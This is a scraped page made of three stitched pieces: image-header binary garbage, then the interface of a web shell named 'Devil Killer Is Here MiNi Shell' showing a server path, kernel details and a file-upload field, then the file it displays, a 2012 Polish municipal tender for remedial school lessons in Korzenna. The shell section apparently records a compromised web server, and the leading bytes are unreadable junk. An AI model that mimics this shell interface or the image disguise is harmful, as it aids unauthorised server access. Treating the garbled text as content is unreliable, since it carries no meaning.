JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120418/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120418/123750-N-2012.html

<p class="kh_header"><b>Korzenna: ŚWIADCZENIE USŁUGI EDUKACYJNEJ W RAMACH PROJEKTU SYSTEMOWEGO PN. Indywidualizacja nauczania w zakresie niwelowania trudności w przyswajaniu programu uczniów klas od I-III szkół podstawowych w Gminie Korzenna - Część 1</b><br>
<b>Numer ogłoszenia: 123750 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korzenna , Korzenna 325, 33-322 Korzenna, woj. małopolskie, tel. 18 440 66 10, faks 18 441 70 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.korzenna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI EDUKACYJNEJ W RAMACH PROJEKTU SYSTEMOWEGO PN. Indywidualizacja nauczania w zakresie niwelowania trudności w przyswajaniu programu uczniów klas od I-III szkół podstawowych w Gminie Korzenna - Część 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia. Przedmiotem zamówienia jest świadczenie usługi edukacyjnej w ramach projektu systemowego p.n. Indywidualizacja nauczania w zakresie niwelowania trudności w przyswajaniu programu uczniów klas od I-III szkół podstawowych w Gminie Korzenna Część 1.Informacja dotycząca projektu.Projekt pod nazwą Indywidualizacja nauczania w zakresie niwelowania trudności w przyswajaniu programu uczniów klas od I-III szkół podstawowych w Gminie Korzenna jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie: 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic w jakości usług edukacyjnych.Cel główny projektu.Celem głównym projektu jest wsparcie w okresie realizacji projektu indywidualnego rozwoju uczniów klas I-III trzynastu szkół podstawowych w gminie Korzenna dostosowanego do zdiagnozowanych potrzeb edukacyjnych uczniów oraz ich możliwości psychofizycznych.Cele szczegółowe:C1- zapewnienie każdemu dziecku, objętemu wsparciem w ramach projektu, oferty edukacyjno-wychowawczo-profilaktycznej, zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi; 
C2- stworzenie warunków w szkołach objętych wsparciem umożliwiających i wspomagających indywidualną pracę nauczyciela z uczniem przez wyposażenie bazy szkoły w niezbędne materiały dydaktyczne do końca realizacji projektu;
C3- poprawa stanu zdrowia uczniów klas I-III SP w gminie w okresie realizacji projektu dotyczącego indywidualizacji. Poprawa u 60% ćwiczących;
C4- poprawa efektów kształcenia u 75% uczestników zajęć.Grupy docelowe projektu - odbiorcy usługi edukacyjnej. Projektem objęci zostaną uczniowie i uczennice klas I-III w 13-tu szkołach podstawowych w Gminie Korzenna (w części 1 usługa szkoleniowa realizowana będzie w 10 szkołach podstawowych). W zajęciach specjalistycznych wezmą udział uczniowie i uczennice ze zdiagnozowanymi problemami stanowiącymi  kryterium rekrutacji. Diagnozę przeprowadził zespół powołany w szkołach: nauczyciele, wychowawcy klas I-III, pedagog szkolny. Diagnoza obejmowała obserwacje uczniów i uczennic klas I-III na zajęciach dydaktycznych oraz pozalekcyjnych. Wyniki diagnozy wykazały konieczność i celowość przeprowadzenia specjalistycznych zajęć, wspomagających pracę szkoły w zakresie indywidualizacji nauczania i wychowania uczniów klas I-III szkół podstawowych.Zakres zamówienia.Zakres usługi obejmuje przeprowadzenie następujących zajęć dodatkowych dla Beneficjentów Ostatecznych projektu uczęszczających do niżej wymienionych szkół podstawowych:
Lp.	Nazwa szkoły	Rodzaj zajęć dodatkowych	Liczba godzin	Liczba grup liczba osób. Szkoła Podstawowa w Janczowej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	36	1 grupa 5 os.	Zajęcia logopedyczne dla dzieci z zaburzeniami mowy	30	1 grupa  4 os.
Szkoła Podstawowa w Jasiennej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  
4 os.Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  12 os.
Szkoła Podstawowa w Koniuszowej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa 
5 os.Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  
6 os. Szkoła Podstawowa w Korzennej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych	30	1 grupa 8 os. Zajęcia logopedyczne dla dzieci z zaburzeniami mowy	30	1 grupa  4 os. Zajęcia polonistyczne rozwijające zainteresowania  uczniów szczególnie uzdolnionych	30	1 grupa  8 os. Szkoła Podstawowa w Mogilnie	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych	30	1 grupa  
7 os. Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  10 os.
Zajęcia muzyczne rozwijające zainteresowania uczniów szczególnie uzdolnionych	30	1 grupa  8 os Szkoła Podstawowa w Łęce	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  3 os. Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  6 os.
Szkoła Podstawowa w Łyczanej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os.
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych	30	1 grupa  5 os.Szkoła Podstawowa w Posadowej Mogilskiej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os.Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  7 os.Szkoła Podstawowa w Trzycierzu	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os.Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  12 os. Szkoła Podstawowa w Wojnarowej	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu także zagrożonych ryzykiem dysleksji	30	1 grupa  5 os.Gimnastyka korekcyjna dla dzieci z wadami postawy	30	1 grupa  10 os.Suma godzin zajęć dodatkowych składających się na przedmiot zamówienia wynosi 726 godzin.
Jeden uczestnik projektu może brać udział w więcej niż 1 rodzaju zajęć. Pod pojęciem godziny należy rozumieć 45 lub 60 minut, w zależności od rodzaju zajęć, zgodnie z zapisami Rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2010r., Nr 228, poz. 1487).
I tak:
a) zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym zagrożonych ryzykiem dysleksji - 45 minut,
c) zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju i mowy - 60 minut,
e) gimnastyka korekcyjna -  60 minut,
j) zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - 45 minut.
Liczebność grup będzie zgodna z zapisami Rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2010r., Nr 228, poz. 1487).
Zajęcia dodatkowe realizowane w ramach projektu prowadzone będą w dziesięciu szkołach podstawowych wykazanych w punkcie 5.1. Zamawiający zapewni bezpłatny dostęp do sal, w których prowadzone będą zajęcia oraz udostępni pomoce dydaktyczne niezwłocznie po ich zakupie, jak również w razie potrzeby udostępni posiadane w danej szkole podstawowej pomoce dydaktyczne, niezbędne do prowadzenia zajęć.
We wszystkich szkołach zajęcia odbywać się będą od poniedziałku do piątku bezpośrednio po zakończeniu przez uczestników projektu obowiązkowych zajęć lekcyjnych z uwzględnieniem planu dowozu dzieci do szkoły i warunków szkoły. Dopuszcza się prowadzenie zajęć dodatkowych również w soboty. 
Dodatkowe zajęcia danego rodzaju mogą być prowadzone w wymiarze maksymalnie 2 godziny dziennie z wyjątkiem zajęć logopedycznych dla dzieci z zaburzeniami mowy. Dodatkowe zajęcia logopedyczne winny odbywać się w wymiarze nie więcej niż 1 godzina dziennie.
Przed rozpoczęciem zajęć dodatkowych Wykonawca otrzyma od dyrektorów poszczególnych szkół objętych projektem, listy uczniów i uczennic zakwalifikowanych do udziału w projekcie (Beneficjentów Ostatecznych) oraz plany lekcji poszczególnych klas I-III.Obowiązki Wykonawcy Opracowanie w terminie do 5 dni od podpisania umowy harmonogramu realizacji poszczególnych zajęć we współpracy z dyrektorami szkół biorących udział w projekcie, uwzględniając podział zajęć dla każdej szkoły oraz plany lekcji beneficjentów ostatecznych, jak również termin i wymiar godzin podany w punkcie 5.1.Opracowanie programów zajęć dodatkowych dostosowanych do indywidualnych potrzeb uczniów i uczennic w tym  uwzględniających zdiagnozowane dysfunkcje.Prowadzenia zajęć metodami aktywizującymi z uwzględnianiem indywidualnych potrzeb edukacyjnych i rozwojowych uczniów i uczennic, z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych - od momentu ich dostarczenia przez Zamawiającego.Prowadzenie zajęć zgodnie z programem i harmonogramem.Wydanie zaświadczeń/certyfikatów potwierdzających udział Beneficjentów Ostatecznych w projekcie, na zakończenie zajęć.Prowadzenie dziennika zajęć osobno dla każdej grupy.
Wykonawca zapewni osiągnięcie następujących celów szczegółowych projektu:
Zapewnienie każdemu dziecku objętemu wsparciem w ramach projektu oferty edukacyjno-wychowawczo-profilktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi (wskaźnik pomiaru celu: liczba uczniów SP z gminy Korzenna, którzy wzięli udział w zajęciach w ramach projektu) - dotyczy wszystkich zajęć dodatkowych,
Poprawę stanu zdrowia uczniów klas I-III szkół podstawowych w gminie w okresie realizacji projektu dotyczącego indywidualizacji (wskaźnik pomiaru celu: liczba uczniów i uczennic u których stwierdzono korektę wad postawy)- dotyczy uczestników zajęć gimnastyki korekcyjnej. Poprawa u co najmniej 60% ćwiczących,
Poprawę efektów kształcenia u co najmniej 75% uczestników zajęć dodatkowych (Liczba uczniów u których zaobserwowano poprawę efektów kształcenia) - dotyczy wszystkich zajęć dodatkowych.Wykonawca będzie sporządzał i  przekazywał następujące dokumenty dotyczące realizacji zajęć:Miesięczne sprawozdania z realizacji godzin w poszczególnych grupach z podziałem na szkoły podstawowe oraz rodzaj zajęć zawierające analizę frekwencji uczestników na zajęciach (w terminie do piątego dnia następnego miesiąca). Listy obecności oraz imienny wykaz Beneficjentów Ostatecznych, którzy brali udział w zajęciach (po skończonym miesiącu w terminie do piątego dnia następnego miesiąca).Imienny wykaz osób, które zrezygnowały z udziału w zajęciach bądź zostały skreślone z listy uczestników z określeniem przyczyn takiego stanu rzeczy (po skończonym miesiącu w terminie do piątego dnia następnego miesiąca).Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć.Zbiorcze opracowanie wyników osiągnięcia celów szczegółowych projektu z uwzględnieniem wskaźnika pomiaru celu ze wskazaniem źródła weryfikacji/pozyskiwania danych do pomiaru wskaźnika (do pięciu dni od zakończenia wszystkich zajęć stanowiących przedmiot umowy).
Umożliwienie zamawiającemu wizytowania zajęć. Zamawiający zastrzega sobie prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć.
Zapewnienie odpowiedniego oznaczenia sal, w których odbywać się będą zajęcia dodatkowe zgodnie z aktualnymi wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki (POKL) dostępnymi na stronie www.pokl.wup-krakow.pl oraz informowania uczestników projektu o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Stosowanie odpowiedniego oznaczenia we wszystkich materiałach oraz dokumentach sporządzanych w ramach projektu zgodnie z wytycznymi dotyczącymi promocji projektów w ramach POKL.
Realizacja zajęć dodatkowych z uwzględnieniem zasady równości szans kobiet i mężczyzn.Wykonawca pod rygorem utraty prawa do zapłaty za zajęcia dodatkowe, zobowiązany jest do niezwłocznego poinformowania zamawiającego o:
nie zgłoszeniu się Uczestników na zajęcia,przerwaniu lub rezygnacji z uczestnictwa w zajęciach dodatkowych,innych sytuacjach, które maja wpływ na prawidłową realizację przedmiotu zamówienia.Wykonawca zobowiązuje się do przechowywania dokumentów związanych z realizacją przedmiotu zamówienia do dnia 31 grudnia 2020 roku w sposób zapewniający dostępność, poufność i bezpieczeństwo.
Zamawiający zastrzega sobie prawo do wglądu do dokumentów Wykonawcy związanych z realizacją przedmiotu zamówienia, w tym dokumentów finansowych.
Wykonawca ponosi odpowiedzialność za bezpieczeństwo dzieci w czasie trwania zajęć dodatkowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie niniejszego warunku będzie oceniane na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie niniejszego warunku będzie oceniane na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie niniejszego warunku będzie oceniane na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku należy wykazać dysponowanie przy realizacji zamówienia    następującymi osobami :
1.	do zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji min. 10 osób posiadających  następujące wykształcenie oraz stopień awansu zawodowego: 
a)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym 
w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
b)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym  
i ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
c)	co najmniej stopień awansu zawodowego nauczyciela kontraktowego, 
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.
2.	do zajęć  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych min. 3 osoby posiadające następujące wykształcenie oraz stopień awansu zawodowego:
a)	ukończone studia wyższe minimum licencjackie lub magisterskie  z przygotowaniem pedagogicznym 
w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
b)	ukończone studia wyższe minimum licencjackie lub magisterskie  z przygotowaniem pedagogicznym  
i ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
c)	co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.


3.	do zajęć  logopedycznych dla dzieci z zaburzeniami rozwoju mowy min.  2 osoby posiadające następujące wykształcenie oraz stopień awansu zawodowego:
a)	ukończone studia wyższe minimum licencjackie lub magisterskie z logopedii  
z  przygotowaniem pedagogicznym, 
b)	ukończone studia wyższe minimum licencjackie lub magisterskie    z przygotowaniem pedagogicznym 
i ukończone studia podyplomowe    z zakresu logopedii,
c)	co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.
4.	do zajęć gimnastyki korekcyjnej  dla dzieci z wadami postawy min. 7 osób posiadających następujące wykształcenie oraz stopień awansu zawodowego:
a)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym 
w zakresie wychowania fizycznego z kwalifikacjami do prowadzenia gimnastyki korekcyjnej,
b)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym 
i ukończony kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej lub ukończone studia podyplomowe 
z zakresu gimnastyki korekcyjnej,
c)	co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.
5.	do zajęć rozwijających  zainteresowania uczniów szczególnie uzdolnionych muzycznie min. 1 osobę posiadającą następujące wykształcenie oraz stopień awansu zawodowego:
a)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem     pedagogicznym 
w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
b)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym  
i ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
c)	co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.
6.	do zajęć rozwijających  zainteresowania uczniów szczególnie uzdolnionych polonistycznie  min. 1 osobę posiadającą następujące wykształcenie oraz stopień awansu zawodowego:
a)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem     pedagogicznym 
w zakresie edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
b)	ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym  
i ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji wczesnoszkolnej lub kształcenia zintegrowanego,
c)   co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
Wykonawca musi spełniać wymagania zawarte w pkt. a i c lub b i c.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie niniejszego warunku będzie oceniane na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.1.	Wypełniony formularz OFERTA , który należy  sporządzić wg wzoru formularza stanowiącego zał. Nr 1 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania  oświadczeń woli w zakresie praw 
i obowiązków majątkowych wykonawcy,
